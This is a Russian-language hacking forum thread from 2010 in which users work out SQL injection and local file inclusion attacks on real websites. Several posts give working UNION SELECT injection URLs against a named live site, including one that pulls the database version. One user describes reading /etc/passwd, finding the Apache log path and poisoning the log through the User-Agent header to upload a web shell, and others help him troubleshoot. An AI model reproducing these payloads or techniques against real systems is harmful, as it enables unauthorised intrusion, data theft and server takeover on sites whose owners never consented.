ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
27.05.2010, 20:27
|
|
Moderator - Level 7
Регистрация: 19.12.2008
Сообщений: 1,203
Провел на форуме:
5011696
Репутация:
2221
|
|
Сообщение от pinch
union+%53%45%4C%45%43%54
Нет слов.
Выкладывайте ссылку, а то гадать нету резона, да ещё и непонятно какая фильтрация, либо по типу preg_match, или по типу preg_replace.
|
|
|
27.05.2010, 20:44
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
что не так?
|
|
|
|
27.05.2010, 20:47
|
|
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094
Репутация:
672
|
|
2 pinch
%53%45%4C%45%43%54=select ?  |
|
|
|
27.05.2010, 20:48
|
|
Новичок
Регистрация: 27.05.2010
Сообщений: 3
Провел на форуме:
28818
Репутация:
1
|
|
Здравствуйте уважаемые форумчане.
Есть небольшой вопросик.
Можно ли использовать лог напрямую, а не черeз ../../../proc/self/fd/{0-9} ?
Просто на одном сайте у меня кроме /etc/passwd ничего не открывалось, я начал искать лог напрямую, через конфиг апача /etc/httpd/config/httpd.conf нашел пути до файла логов, и вывел его напрямую. Нашел ошибку и попытался через юзерагент залить шел.
Потом просто перестал открываться лог. Возможно я по неопытности запорол. Возможно system() было запрещено. Или же вся проблемы что с этим логом не получиться залить впринципе?
|
|
|
|
27.05.2010, 20:54
|
|
Участник форума
Регистрация: 13.12.2009
Сообщений: 130
Провел на форуме:
540530
Репутация:
54
|
|
2 pinch %53%45%4C%45%43%54=select ?
да
|
|
|
|
27.05.2010, 21:00
|
|
Участник форума
Регистрация: 30.03.2008
Сообщений: 208
Провел на форуме:
869744
Репутация:
18
|
|
Сообщение от Pashkela
еще мессаг~10 примерно, и мы таки придем к тому, что надо выложить сцыку и уже не страдать ерундой, мда. Придлагаю внести в правила
http://www.worstpreviews.com/review.php?id=-1+UniOn+all+SelEct+1,2,3,4,5,6,7,8,9,10,11,12--
|
|
|
|
27.05.2010, 21:23
|
|
Reservists Of Antichat - Level 6
Регистрация: 05.12.2006
Сообщений: 195
Провел на форуме:
14023893
Репутация:
2163
|
|
Сообщение от GOGA075
http://www.worstpreviews.com/review.php?id=-1+UniOn+all+SelEct+1,2,3,4,5,6,7,8,9,10,11,12--
там нет никакой фильтрации, два запроса, ты работаешь со вторым, кол-во колонок подобрано правильно (вторая ошибка исчезает (,13)). данные на страницу скорее всего попадают с двойных запросов; можешь конечно поэксперементировать с полями, но проще заюзать соседний скрипт:
http://worstpreviews.com/headline.php?id=-8848+union+select+1,2,3,4,5,6,7,8
__________________
Я так же грустен как орангутанг
Сидящей пред галдящею толпою
Суровый житель отогретых стран
Коварно преданный разлуке и покою
Ему и мне насмешница судьба
Дала для жизни крохотную клетку
Нам предстоит в ней долгоя хотьба
За тертую морковь, и за конфетку..
|
|
|
|
27.05.2010, 22:05
|
|
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293
Репутация:
4915
|
|
можно и этот
http://www.worstpreviews.com/review.php?id=-1+UNION SELECT version(),2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34 ,35,36,37,38,39,40,41--+
|
|
|
|
27.05.2010, 22:29
|
|
Участник форума
Регистрация: 06.02.2008
Сообщений: 110
Провел на форуме:
217423
Репутация:
32
|
|
Сообщение от trafbot
Здравствуйте уважаемые форумчане.
Есть небольшой вопросик.
Можно ли использовать лог напрямую, а не черeз ../../../proc/self/fd/{0-9} ?
Просто на одном сайте у меня кроме /etc/passwd ничего не открывалось, я начал искать лог напрямую, через конфиг апача /etc/httpd/config/httpd.conf нашел пути до файла логов, и вывел его напрямую. Нашел ошибку и попытался через юзерагент залить шел.
Потом просто перестал открываться лог. Возможно я по неопытности запорол. Возможно system() было запрещено. Или же вся проблемы что с этим логом не получиться залить впринципе?
Все файлы перестали открываться и /etc/passwd и /etc/httpd/config/httpd.conf?
Если сама дырка осталась, то вряд ли system() запретили.
Ссылку в студию?
|
|
|
|
27.05.2010, 22:35
|
|
Новичок
Регистрация: 27.05.2010
Сообщений: 3
Провел на форуме:
28818
Репутация:
1
|
|
Перестал открываться сам лог только, в который и было записано system(), я вот думаю system был отключен и это вызывало ошибку, а вывод самой ошибки был закрыт. Идея имеет право на жизнь, как думаете??? И работал кто-то с логами напрямую для шелов? Все остальное осталось как было. Причем это было на двух логах этой дыры. Дома на днях поищу ссыль.
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
